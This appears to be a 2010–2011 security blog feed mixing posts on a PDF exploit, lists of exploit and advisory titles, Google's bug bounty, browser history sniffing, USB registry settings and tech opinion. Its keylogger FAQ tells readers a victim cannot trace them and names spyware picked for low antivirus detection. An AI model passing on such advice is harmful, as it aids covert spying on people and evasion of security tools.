HACK INVERSE

Adobe Reader > MAY DOOM YOU

noreply@blogger.com (Hackinverse) — Tue, 01 Feb 2011 17:11:00 +0000

In the last period of time malware authors started focusing more and more on exploiting Adobe Reader (and ultimately users computers) via maliciously crafted documents. And vulnerabilities in Adobe Reader have been quite a few lately.
Adobe Reader oriented attack was also the malicious injection on my last hosting service…

In the recent issue of (in)SECURE Magazine, namely issue 21, there is an article named “Malicious PDF: Get owned without opening” by Didier Stevens which shown an exploit in an Adobe Reader filter which made possible successful exploitation without file opening.

When a PDF document is listed in a Windows Explorer window, the PDF column handler shell extension will be called by Windows Explorer when it needs the additional column info. The PDF column handler will read the PDF document to extract the necessary info, like the Title, Author, etc. (…) Under the right circumstances, a Windows Explorer Shell Extension will read the PDF document to provide extra information, and in doing so, it will execute the buggy code and trigger the vulnerability

Other ways how the exploit could be launched (from the explorer window) where by: selecting the pdf (left click), hovering over it and changing the folder view to “Thumbnail”.

All these previous exploitation scenarios required minimal user interaction, but the author had another card in his pocket. The JBIG2Decode vulnerability could be exploited by the Windows Indexing Service alone, the only difference being that this way the exploit would run with less privileges; namely with Local System ones…
There you have it, another reason to switch to a pdf reader alternative.
UPDATE: a resourceful article about pdf exploitation can be found here.

Hack Tools/Exploits

noreply@blogger.com (Hackinverse) — Tue, 01 Feb 2011 16:54:00 +0000

Astalavista Tools and Utilities

Passwords are DEAD! (Long live passwords?) - Following a brief history and definition of passwords, this paper will show three properties of passwords that render passwords risky or unsuitable for use.
A Concept for Universal Identification - The goal of this paper is to provide a detailed look at a new perspective for a unified, secure and consolidated form of personal identification. The advanced yet inexpensive technology exists today to step up modern identification to the next level.
Biometrics and User Authentication - The purpose of this paper will be to look at the use of biometrics technology to determine how secure it might be in authenticating users, and how the users job function or role would impact the authentication process or protocol. We will also examine personal issues of privacy in the methods used for authentication; the cost of implementing a biometrics authentication system; the efficiency of biometrics authentication; and the potential for false positive or negative recognition of individual users.
Authentication and Authorization: The Big Picture with IEEE 802.1X - This paper explores how Auth-x brings authentication and authorization down to a port level, enabling true privilege-based management of network services.
SSLSmart - Smart SSL Cipher Enumeration - Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and applications.
Microsoft Excel Spreadsheets Expose User PIN Used For Confidential/Secure Printing - Whitepaper called Microsoft Excel Spreadsheets Expose User PIN Used For Confidential/Secure Printing.
Antivirus / Firewall Evasion Techniques : Evolution of Download Deploy Shellcode - Whitepaper called Antivirus / Firewall Evasion Techniques : Evolution of Download Deploy Shellcode.
Effectiveness of Antivirus in Detecting Web Application Backdoors - Whitepaper called Effectiveness of Antivirus in Detecting Web Application Backdoors.
Netbios Share Scanner 0.3 - This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.
Changes: IP mask and range support.
GetHTTPStatus Scanning Script - GetHTTPStatus is a simple python script that scans a set of provided URLs and returns the status codes provided. It has the ability to use cookies if needed.

Packetstorm Last 10 Files

Core Security Technologies Advisory 2010-1001 - Core Security Technologies Advisory - There are stack overflows on WebEx that can be exploited by sending maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When opened, these files trigger a reliably exploitable stack based buffer overflow. Code execution is trivially achieved on the .wrf case because WebEx Player allocates a function pointer on the stack that is periodically used in what seems to be a callback mechanism, and also because DEP and ASLR are not enabled. In the .atp case an exception handler can be overwritten on the stack, and most registers can be trivially overwritten.
Zero Day Initiative Advisory 11-037 - Zero Day Initiative Advisory 11-037 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec IM Manager. Authentication is required to exploit this vulnerability in that a logged in user must be coerced into visiting a malicious link. The specific flaw exists within the ScheduleTask method exposed by the IMAdminSchedTask.asp page hosted on the web interface. This function does not properly sanitize user input from a POST variable before passing it to an eval call. An attacker can abuse this to inject and execute arbitrary ASP under the context of the user visiting the malicious link.
SSLSmart - Smart SSL Cipher Enumeration - Whitepaper called SSLSmart - Smart SSL Cipher Enumeration. This document focuses on the SSLSmart tools uses and applications.
SSLSmart SSL Testing Tool 1.0 - SSLSmart is an open source, highly flexible and interactive tool aimed at improving efficiency and reducing false positives during SSL testing. A number of tools allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating only an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.
Zero Day Initiative Advisory 11-036 - Zero Day Initiative Advisory 11-036 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM DB2. Authentication is not required to exploit this vulnerability. The flaw exists within the db2dasrrm component which listens by default on TCP port 524. When allocating a buffer within receiveDASMessage a user supplied length is used as a parameter to malloc(). This buffer is later copied into without any bounds checking and can be made to overflow. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the das user user.
Netbios Share Scanner 0.3 - This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.
CMS WebManager-Pro 7.4.3 Code Execution / Cross Site Request Forgery - CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.
Clam AntiVirus Toolkit 0.97rc - Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a commandline scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use in your own software.
Zero Day Initiative Advisory 11-035 - Zero Day Initiative Advisory 11-035 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM DB2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the db2dasrrm process responsible for handling queries to the com.ibm.db2.das.core.DasSysCmd function. While processing a request, the username supplied is copied into a fixed-length stack buffer. By providing a large enough string the copy operation can overflow leading to remote code execution.
Zero Day Initiative Advisory 11-034 - Zero Day Initiative Advisory 11-034 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Performance Insight Server. Authentication is not required to exploit this vulnerability. The specific vulnerability is due to a hidden account present within the com.trinagy.security.XMLUserManager Java class. Using this account a malicious user can access the com.trinagy.servlet.HelpManagerServlet class. This is defined within the piweb.jar file installed with Performance Insight. This class exposes a doPost() method which an attacker can use to upload malicious files to the server. Accessing these files can then lead to arbitrary code execution under the context of the SYSTEM user.

Packetstorm Tools

Netbios Share Scanner 0.3 - This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.
GetHTTPStatus Scanning Script - GetHTTPStatus is a simple python script that scans a set of provided URLs and returns the status codes provided. It has the ability to use cookies if needed.
NIELD (Network Interface Events Logging Daemon) 0.10 - Network Interface Events Logging Daemon is a tool that receives notifications from the kernel through the rtnetlink socket, and generates logs related to link state, neighbor cache(ARP,NDP), IP address(IPv4,IPv6), route, FIB rules.
Nmap Port Scanner 5.50 - Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.
Packet Fence 2.0.1 - PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.
OATH Toolkit 1.4.5 - The OATH Toolkit attempts to collect several tools that are useful when deploying technologies related to OATH, such as HOTP one-time passwords. It is a fork of the earlier HOTP Toolkit.
Netbios Share Scanner 0.2 - This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.
Malmon Detection Tool 0.1b - Malmon is a real-time exploit/backdoor detection tool for Linux that audits the integrity of files in a given directory.
Tor-ramdisk i686 UClibc-based Linux Distribution x86_64 20110119 - Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Security is enhanced by employing a monolithically compiled GRSEC/PAX patched kernel and hardened system tools. Privacy is enhanced by turning off logging at all levels so that even the Tor operator only has access to minimal information. Finally, since everything runs in ephemeral memory, no information survives a reboot, except for the Tor configuration file and the private RSA key which may be exported/imported by FTP. x86 version.
Tor-ramdisk i686 UClibc-based Linux Distribution x86 20110119 - Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Security is enhanced by employing a monolithically compiled GRSEC/PAX patched kernel and hardened system tools. Privacy is enhanced by turning off logging at all levels so that even the Tor operator only has access to minimal information. Finally, since everything runs in ephemeral memory, no information survives a reboot, except for the Tor configuration file and the private RSA key which may be exported/imported by FTP. x86 version.

Packetstorm Exploits

CMS WebManager-Pro 7.4.3 Code Execution / Cross Site Request Forgery - CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.
Joomla Clan Members SQL Injection - The Joomla Clan Members component suffers from a remote SQL injection vulnerability.
AOL 9.5 .rtx Local Buffer Overflow - AOL version 9.5 suffers from a .rtx buffer overflow vulnerability.
NetZip Classic Buffer Overflow - NetZip Classic version 7.5.1.86 suffers from a buffer overflow vulnerability.
Joomla VirtueMart 1.1.6 Blind SQL Injection - Joomla VirtueMart component versions 1.1.6 and below suffer from a remote blind SQL injection vulnerability.
eSyndiCat Directory Software Cross Site Scripting - eSyndiCat Directory Software versions 2.2 and 2.3 suffer from a cross site scripting vulnerability.
SDP Downloader Buffer Overflow - SDP Downloader http_response remote buffer overflow exploit.
Joomla Front End User Access Local File Inclusion - The Joomla Front End User Access component suffers from a local file inclusion vulnerability.
Harvard.edu Local File Inclusion - www.hcs.harvard.edu appears to suffer from a local file inclusion vulnerability.
Maxthon Browser 3.0.20.1000 Denial Of Service - Maxthon Browser version 3.0.20.1000 .ref .replace denial of service exploit.

Securiteam Exploits

Symantec Web Gateway Management Interface USERNAME Blind SQL Injection Vulnerability - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway.
HP-UX Running Java Runtime Environment (JRE) or Java Developer Kit (JDK) Multiple Vulnerabilities - Remote execution of arbitrary code, disclosure of information and other vulnerabilities affecting HP-UX.
RealNetworks RealPlayer MLTI Stream Number Code Execution Vulnerability - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer.
Apple QuickTime PICT File PackBits Code Execution Vulnerability - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
Apple QuickTime PICT directBitsRect Pack3 Code Execution Vulnerability - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime.

FEEL FREE TO COMMENT....

KEY-LOGGERS FAQ

noreply@blogger.com (Hackinverse) — Tue, 01 Feb 2011 16:48:00 +0000

A keylogger sometimes called a spying software is a small program which is used to monitor a local or a Remote PC, Keyloggers now a days are so easy to use that a person with even a basic knowledge of computers can use keylogger.Once a keylogger is installed in your computer it can monitor each and every keystroke typed on your computer, thus you can see how dangerous a keylogger can be.
Types of Keylogger

There are two types of Keyloggers:

1.Hardware keylogger
2.Software keylogger

Hardware keyloggers are rarely used now a days since you can monitor a Remote computer, Software keyloggers are the most widely used keyloggers as some of them support remote installaiton which means that you can monitor any computer anywhere in the World.

Can the victim detect it's presence once keylogger is installed in his/her computer?

Well it's really difficult for the victim to detect keylogger's presence as it runs in complete stealth mode, It hides it self from task manager, startup etc

Can I the victim trace you back?

Once the keylogger is installed, I think it's almost impossible for the victim to trace you back

How can I protect my self from keylogger?

A simple keylogger can be detected by even a lame antivirus, but sometimes the attacker can use methods like Crypting,Binding,Hexing etc, that make it harder for the Antivirus to detect the keylogger. So to counter that you should use a piece of software called sandboxie, Sandboxie runs the choosen computer program in an Isolated space so if the file you receive is a keylogger, You need no to worry because it won't affect your other programs, Firefox users can use the free version of keyscrambler which encrypts each and every keystrokes you type, so even if a keylogger is installed in your computer, You need not to worry as the attacker will receive the encrypted keystroke

Which Keylogger is the best?

With my experience of more than 4 years in the field of Ethical Hacking and security I suggest only two keyloggers which I think are best and have a comparatively low antivirus detection rate:

1.Sniperspy
2.Winspy

How do I find if a file is binded with a keylogger?

Keylogger can be binded with almost any file so how do you know if the file is binded?, You can use Bintext or Hex editor to find out, But Bintext and Hex editing method do not work effectively if the server is crypted so alternatively there is a great piece of software named asas "Resource hacker" that can tell you if the file is binded or not

>>FEEL FREE TO COMMENT

ANY MORE QUESTIONS..ASK US..

Wikileaks- will the whistle blower now blow India?

noreply@blogger.com (Anonymous) — Thu, 16 Dec 2010 07:49:00 +0000

The dirty game is on both on the shelf and of the shelf.
With the arrest of wikileaks founder in London has arouse a tremor both in the cyberspace and in the real world . The whistle blower has really brought u a big issue in front now. The website has brought out many classified documents infront of public and exosed the other face of the "big brother".
WikiLeaks has been under intense pressure since it began publishing some 250,000 secret U.S. diplomatic cables, with attacks on its websites and threats against its founder, Julian Assange, who is now in a British jail fighting extradition to Sweden on sex crime allegations.

The Germany-based Wau Holland Foundation, which has described itself as WikiLeaks' main backer, on Thursday protested PayPal's decision to cut ties with WikiLeaks and said about euro10,000 ($13,000) in donations had been frozen.

The foundation rejected PayPal's allegation it was supporting illegal activity and said its lawyer had demanded that PayPal restore access to the account.

WikiLeaks' payment processor, DataCell ehf, said it was preparing to sue Visa and MasterCard over their refusal to process donations to WikiLeaks. DataCell CEO Andreas Fink said he would seek damages from the U.S. credit card companies, saying "it is simply ridiculous to think WikiLeaks has done anything criminal."

Pillay said if WikiLeaks had broken the law "then this should be handled through the legal system and not through pressure and intimidation."

In the Netherlands, a 16-year-old boy suspected of being involved in digital attacks by Wikileaks supporters was arrested.

The flow of online support has also sparked some solidarity on the streets. One pro-WikiLeaks protest in Australia sent about 250 demonstrators into the streets of Brisbane, while in the central Pakistani city of Multan, dozens took to the streets to burn U.S. and British flags to protest Assange's detention.

Will the next Wikileaks expose India's corrupt?

While Wikileaks did not say in its message what the third instalment of their release would cover. However, a Reuters despatch from Washington DC said that classified US diplomatic cables reporting corruption allegations against foreign governments and leaders are expected to feature in the official documents that Wikileaks plans to release. It added:"Three sources familiar with the US State Department cables held by Wikileaks say the corruption allegations in them are major enough to cause serious embarrassment for foreign governments and politicians named in them. They said the release was expected next week, but it could come earlier. The detailed, candid reports by US diplomats also may create foreign policy complications for the administration of US President Barack Obama.

he media has reported that the US has warned India and other key governments across the world about the expected release. Crowley has been quoted as saying: "We have reached out to India to warn them about a possible release of documents." Among other Governments reportedly cautioned are those of Israel, Russia, Turkey, Canada and the UK.

Among the various events relating to Afghanistan, Iraq and Iran in which India figured during this period, four could be sensitive from India's point of view. Firstly, the pressure exerted on the Atal Behari Vajpayee government by the George Bush administration to send Indian troops to Iraq. By July,2003, the Vajpayee government had decided to say no to Washington DC, but there was a lot of voices in Delhi in favour of accepting the US request.

The game is not over yet . Wikileaks will still be publishing the documents they have.

We still cant say that to which way this will go but one thing is for sure that the whistle blower has really pissed of America. I truly want wikileaks to do some favour on my country too and expose some scams here in India . I feel its more needed in India.

Google Vulnerability Reward Program

noreply@blogger.com (Anonymous) — Thu, 16 Dec 2010 06:43:00 +0000

Back in January of this year, the Chromium open source project launched a well-received vulnerability reward program. In the months since launch, researchers reporting a wide range of great bugs have received rewards — a small summary of which can be found in the Hall of Fame. They’ve seen a sustained increase in the number of high quality reports from researchers, and their combined efforts are contributing to a more secure Chromium browser for millions of users.

Today, They are announcing an experimental new vulnerability reward program that applies to Google web properties. They already enjoy working with an array of researchers to improve Google security, and some individuals who have provided high caliber reports are listed on Their credits page. As well as enabling them to thank regular contributors in a new way, they hope their new program will attract new researchers and the types of reports that help make their users safer.

In the spirit of the original Chromium blog post, they have some information about the new program in a question and answer format below:

Q) What applications are in scope?
A) Any Google web properties which display or manage highly sensitive authenticated user data or accounts may be in scope. Some examples could include:

*.google.com
*.youtube.com
*.blogger.com
*.orkut.com

For now, Google’s client applications (e.g. Android, Picasa, Google Desktop, etc) are not in scope. They may expand the program in the future.

Q) What classes of bug are in scope?
A) It’s difficult to provide a definitive list of vulnerabilities that will be rewarded, however, any serious bug which directly affects the confidentiality or integrity of user data may be in scope. They anticipate most rewards will be in bug categories such as:

XSS
XSRF / CSRF
XSSI (cross-site script inclusion)
Bypassing authorization controls (e.g. User A can access User B’s private data)
Server side code execution or command injection

Out of concern for the availability of their services to all users, they ask us to refrain from using automated testing tools.

These categories of bugs are definitively excluded:

attacks against Google’s corporate infrastructure
social engineering and physical attacks
denial of service bugs
non-web application vulnerabilities, including vulnerabilities in client applications
SEO blackhat techniques
vulnerabilities in Google-branded websites hosted by third parties
bugs in technologies recently acquired by Google

Q) How far should I go to demonstrate a vulnerability?
A) Please, only ever target your own account or a test account. Never attempt to access anyone else’s data. Do not engage in any activity that bombards Google services with large numbers of requests or large volumes of data.

Q) I’ve found a vulnerability — how do I report it?
A) Contact details are listed here. Please only use the email address given for actual vulnerabilities in Google products. Non-security bugs and queries about problems with our account should instead be directed to the Google Help Centers.

Q) What reward might I get?
A) The base reward for qualifying bugs is $500. If the rewards panel finds a particular bug to be severe or unusually clever, rewards of up to $3,133.7 may be issued. The panel may also decide a single report actually constitutes multiple bugs requiring reward, or that multiple reports constitute only a single reward.

Some researchers aren’t interested in the money, so they’d also like to give us the option to donate our reward to charity. If we do, they’ll match it — subject to their discretion.

Regardless of whether we’re rewarded monetarily or not, all vulnerability reporters who interact with them in a respectful, productive manner will be credited on a new vulnerability reporter page. If they file a bug internally, we’ll be credited.

Superstar performers will continue to be acknowledged under the “We Thank You” section of this page.

Q) How do I find out if my bug qualified for a reward?
A) We will receive a comment to this effect in an emailed response from the Google Security Team.

Q) What if someone else also found the same bug?
A) Only the first report of a given issue that we had not yet identified is eligible. In the event of a duplicate submission, only the earliest received report is considered.

Q) Will bugs disclosed without giving Google developers an opportunity to fix them first still qualify?
A) They believe handling vulnerabilities responsibly is a two-way street. It’s their job to fix serious bugs within a reasonable time frame, and they in turn request advance, private notice of any issues that are uncovered. Vulnerabilities that are disclosed to any party other than Google, except for the purposes of resolving the vulnerability (for example, an issue affecting multiple vendors), will usually not qualify. This includes both full public disclosure and limited private release.

Q) Do I still qualify if I disclose the problem publicly once fixed?
A) Yes, absolutely! They encourage open collaboration. They will also make sure to credit us on their new vulnerability reporter page.

Q) Who determines whether a given bug is eligible?
A) Several members of the Google Security Team including Chris Evans, Neel Mehta, Adam Mein, Matt Moore, and Michal Zalewski.

Q) Are you going to list my name on a public web page?
A) Only if you want them to. If selected as the recipient of a reward, and we accept, they will need our contact details in order to pay us. However, at our discretion, we can choose not to be listed on any credit page.

Q) No doubt you wanted to make some legal points?
A) Sure. They encourage broad participation. However, they are unable to issue rewards to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. This program is also not open to minors. We are responsible for any tax implications depending on our country of residency and citizenship. There may be additional restrictions on our ability to enter depending upon our local law.

This is not a competition, but rather an experimental and discretionary rewards program. We should understand that they can cancel the program at any time, and the decision as to whether or not to pay a reward has to be entirely at our discretion.

Of course, our testing must not violate any law, or disrupt or compromise any data that is not our own.

Cool isnt it? So guys why don't we try it?

Happy researching

DOWNLOAD!! UR ENTIRE FACEBOOK HISTORY

noreply@blogger.com (Anonymous) — Thu, 16 Dec 2010 06:35:00 +0000

Now it is possible to download every single bit of information you have put on Facebook, including pictures, status updates, events and messages. This is undoubtedly the control many users have been looking for, and provides a nice “grab and go” option for those fed up with the service.

The feature should have rolled out to most accounts by now, but if it’s still not working for you then you’ll just have to be patient and wait your turn.

Why Do I Want All That Data?

Maybe you’re just fed up with Facebook. You’ve been using the service for years and have watched it transform from a useful tool for organising parties into a popularity contest for the under 15′s. You want to jump ship.

Well now you can do that, except before you jump you can pack up all your data and download your Facebook history. Once you’ve found a suitable alternative, like the developing Diaspora, you can simply upload the data you once shared on Facebook. It’s also useful if you’ve ever wanted to give your Facebook account a facelift and remove all the pictures you don’t want your boss/gran to see (without losing them forever, although you should have backed them up really).

I just enjoyed looking at old status updates to be honest.

Download Instructions

You’ll find instructions to download the data in your Account Settings page. Once you’ve logged into your Facebook account click Account and then choose Account Settings from the drop-down menu.

On the first page of settings (cleverly titled Settings) you should notice a new option beneathAccount Security that says Download your information. Click on learn more to lodge your request.

On the next screen click Download and you will be notified that for your data to be collected, you’ll need to be patient and wait for Facebook’s servers to complete the request. If you’re a bit of a Facebook addict this will probably take longer, but the download should be ready within the hour.

Once you’ve done that it’s a case of sitting back and waiting for the email.

Ding! Data’s Done

Once your .ZIP file is piping hot and golden brown on the surface it’s ready. Facebook should have emailed you a link to download the data, I received mine within 15 minutes of making the request it and the file was a surprising 62MB (I expected it to be bigger).

With your .ZIP downloaded you’ll then want to extract it. You’ll notice that it’s separated into a few folders: html, pictures and videos as well as a index.html and readme file.

The index.html file provides a handy way to browse the data in offline mode, from the comfort of your browser. You’re also free to go nuts and dive right into each folder, especially handy if you’re after a specific picture.

Your wall has essentially been preserved as it is seen on Facebook’s website, give or take the odd bit of info. Everything has been collated into one massively long HTML file, which can take a while to process.

Popular sites caught sniffing user browser history

noreply@blogger.com (Anonymous) — Thu, 16 Dec 2010 06:30:00 +0000

Boffins from Southern California have caught YouPorn.com and 45 other sites stealing visitors' surfing habits in what is believed to be the first study to measure in-the-wild exploits of a decade-old browser liability. YouPorn, which fancies itself the YouTube of smut, uses JavaScript to detect whether visitors have recently browsed to PornHub.com, tube8.com and 21 other sites, according to the study. It tracked the 50,000 most popular websites and found a total of 46 other offenders, as well as news sites license.net and newsmax.com, finance site morningstar.com and sports site espnf1.com.

“We found that several popular sites – including an Alexa global top-100 site – make use of history sniffing to exfiltrate information about users' browsing history, and, in some cases, do so in an obfuscated manner to avoid easy detection,” the report states. “While researchers have known about the possibility of such attacks, hitherto it was not known how prevalent they are in real, popular websites.”

To cover its tracks, You Porn encodes its JavaScript to hide the sites it searches for and decodes it only when used. Other websites dynamically generate the snoop code to stop detection by simple inspection. Still others rely on third-party history-stealing libraries from services that include interclick.com and meaningtool.com. The scientists detected the history stealing by concocting their own version of Google's Chrome browser with a JavaScript information flow engine that
“uses a active source-to-source rewriting approach.”

The 46 sites exploit a widely known vulnerability that currently exists in all production version browsers except of Apple's Safari, which earlier this year became the first major browser to insulate users against the threat. Google Chrome, which is based on the same Webkit engine, soon followed. Beta versions of Mozilla Firefox and Microsoft Internet Explorer also fix the problem, but production versions of those browsers are still wide open. The exploit works by using JavaScript to read cascading style sheet technologies included in virtually every browser that causes visited links to appear in purple rather than blue. Developers have known of the weakness for a decade or more but until recently said it couldn't be easily repaired without removing core functionality.

The study also detected code on sites maintained by Microsoft, YouTube, Yahoo and About.com that perform what the scientists called “behavioral sniffing.” They employ JavaScript that covertly tracks mouse movements on a page to detect what a user does after visiting it.

How to disable or enable USB port or device

noreply@blogger.com (Hackinverse) — Wed, 15 Dec 2010 20:45:00 +0000

USB Devices are portable enough to carry the data from one computer to another , It is always risky to enable USB ports of computers in large organizations , data center and cyber cafes since it can be the gateway for virus and malwares. You can disable or enable USB port or device in three ways

Enable / Disable USB port and device in BIOS
It can be enabled or disabled in BIOS where the peripheral device setting is configured. While booting the system you will be getting an option to configure BIOS settings. But only problem is you will not be able to use those USB ports for any purpose like connecting USB keyboards or mouse or any devices.
Enable / Disable USB port and device using registry hack in windows
Another effective way to enable or disable USB port or device is to hack registry entry in windows , it will allow you to use your USB port for other functions like connecting keyboard or mouse but you can restrict the data storage through USB port

A. Click on Start –> Run –> regedit [enter]
B. Search for the key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor”

C. Select the key UsbStor, double clicks on Start value.D. In “Value data” enter 4 to disable USB storage, or enter 3 to enable USB storage on windows system

Freeware to enable or disable USB port or device in Windows 7 and XP
There is a nice tool to enable or disable USB PORT in registry. It exactly does the above mentioned steps. If you are not an experienced users then I would prefer you to use below mentioned software for this task. Please remember that it is always risky to edit windows registry.

“h4x0r 1n m3″ – Developing a Hacker’s Behaviour

noreply@blogger.com (Unknown) — Tue, 14 Dec 2010 05:50:00 +0000

To obtain the status of a Hacker, You Have To Want It, and You Have To Earn It. It is not something that can really be taught, it is only something you can learn for yourself, although I can attempt to help guide you.

Although hackers are substantially different people with unique personalities, they mysteriously all seem to lead similar lifestyles.

Dressing Style: Clothes can range from your typical nerdy suit with pocket protectors and suspenders as if their mom still dresses them, to a gothic/techno-rave homemade looking getup. Considering the fact that hackers exist all over the world, you can’t really place their style of clothing into a particular group; the most famous however is hoodies and shades, kind of like a gangster as it makes one appear very incognito (even though the paleness from lack of sunlight gives them away).

Living Style: A typical hacker will drive a cargo van, live in their home’s basement (or alone), listen to video game music rather than regular music (even though more and more popular music has been making its way into video games), and will likely have their room decorated with something very cultural or sci-fi, whether it be japanese manga/anime, action-figures, or the like.

Sports: Geeks don’t like sports whether a result of a traumatic childhood memory or just because of the physical activity involved. Even sport themed video games rarely get any attention from this crowd. Fantasy and first-person-shooter games are much more appealing.

Fooding Habits: Flat foods seem to be quite popular, such as cheese, hot pockets, pop tarts, toast, and pizza, anything microwavable. There are quite a few theories as to why this is so, and the majority seems to agree it is because geeks are just lazy and want something easy to make. Although I could have sworn I heard somewhere that it goes way back to a specific tyrant in the early days of the computer business who shall remain nameless, who overworked his programmers, and some joke/rumor spread around that he slipped food to them underneath of the doors. Both explanations are perfectly feasible. Caffeinated beverages are also a must, as insomnia and countless hours of coding need fuel. A famous saying is “Sleep is for the Weak.”

Talking Style: A hacker rarely speaks unless they have to, and they type as little as possible by abbreviating or using acronyms. It reserves strength, and is good for multi-tasking. The geek mind thinks out of the box, automation, the less work the better. It is always better to use E-mail or txt messaging over your voice, even if it’s to communicate with someone sitting right next to you. Electronic messaging is the next best thing to telepathy (even though I hear they have some people playing video games with microchips in their brains now, craziness). A hacker may also very well be bilingual; they are extremely cultural people, but just because someone is a geek doesn’t mean they know every other geek in the world, so don’t ask.

Public Appearance: Hackers more or less either fade in or stand out, but mostly fade in. Hackers do tend to avoid drawing any unnecessary attention to themselves. It is perfectly okay for hackers to mock themselves, amongst themselves, but for anyone else to do it could be considered offensive. I wasn’t exactly flattered by the fact that one time when the electricity went out, when all the lights come back on everybody was looking at me… okay yes I was.

Book Worms: Hackers like to hang out at bookstores in the coding section, and at radio shack. Some experts say that anyone with a rudimentary knowledge of electronics can obtain the sufficient materials needed from radio shack to assemble an extremely complex bomb. Not that a hacker likes to build bombs or anything, but it’s an excellent place to experiment with and learn about electronics.

Linux isn’t exactly the same as Windows.

noreply@blogger.com (Unknown) — Tue, 14 Dec 2010 05:43:00 +0000

You’d be amazed how many people make this complaint. They come to Linux, expecting to find essentially a free, open-source version of Windows. Quite often, this is what they’ve been told to expect by over-zealous Linux users. However, it’s a paradoxical hope.

The specific reasons why people try Linux vary wildly, but the overall reason boils down to one thing: They hope Linux will be better than Windows. Common yardsticks for measuring success are cost, choice, performance, and security. There are many others. But every Windows user who tries Linux, does so because they hope it will be better than what they’ve got.

Therein lies the problem.

It is logically impossible for any thing to be better than any other thing whilst remaining completely identical to it. A perfect copy may be equal, but it can never surpass. So when you gave Linux a try in hopes that it would be better, you were inescapably hoping that it would be different. Too many people ignore this fact, and hold up every difference between the two OSes as a Linux failure.

As a simple example, consider driver upgrades: one typically upgrades a hardware driver on Windows by going to the manufacturer’s website and downloading the new driver; whereas in Linux you upgrade the kernel.

This means that a single Linux download & upgrade will give you the newest drivers available for your machine, whereas in Windows you would have to surf to multiple sites and download all the upgrades individually. It’s a very different process, but it’s certainly not a bad one. But many people complain because it’s not what they’re used to.

Or, as an example you’re more likely to relate to, consider Firefox: One of the biggest open-source success stories. A web browser that took the world by storm. Did it achieve this success by being a perfect imitation of IE, the then-most-popular browser?

No. It was successful because it was better than IE, and it was better because it wasdifferent. It had tabbed browsing, live bookmarks, built-in searchbar, PNG support, adblock extensions, and other wonderful things. The “Find” functionality appeared in a toolbar at the bottom and looked for matches as you typed, turning red when you had no match. IE had no tabs, no RSS functionality, searchbars only via third-party extensions, and a find dialogue that required a click on “OK” to start looking and a click on “OK” to clear the “Not found” error message. A clear and inarguable demonstration of an open-source application achieving success by being better, and being better by being different. Had FF been an IE clone, it would have vanished into obscurity. And had Linux been a Windows clone, the same would have happened.

The Browser Takes All

noreply@blogger.com (Unknown) — Mon, 13 Dec 2010 13:00:00 +0000

This week, Google unveiled a computer like no other: the Cr-48, a notebook that relies on the Web for all its software applications. Yet the Web search giant thinks the notebook can compete with computers that run all kinds of installed software.

The matte black Cr-48 won't be sold to the public, but thousands are being sent to consumers and businesses who have volunteered to test it. It introduces a new kind of operating system, called Chrome OS, that turns to the Web for almost everything. Google is pitching Chrome OS as its vision for a new form of computing—one that shifts the data, functionality and almost everything else you would expect from your desktop computer into the cloud. Chrome OS will get its biggest test when Acer and Samsung start selling notebook computers customized to run the software in mid-2011.

Google's Chrome OS vision is perhaps best understood by examining the differences between Chrome OS and the operating systems commonly used today, says Sundar Pichai, the vice president of product management for Chrome OS (and the related Chrome Web browser). Those differences come from a single design decision about the relationship between a person and his computer, Pichai says

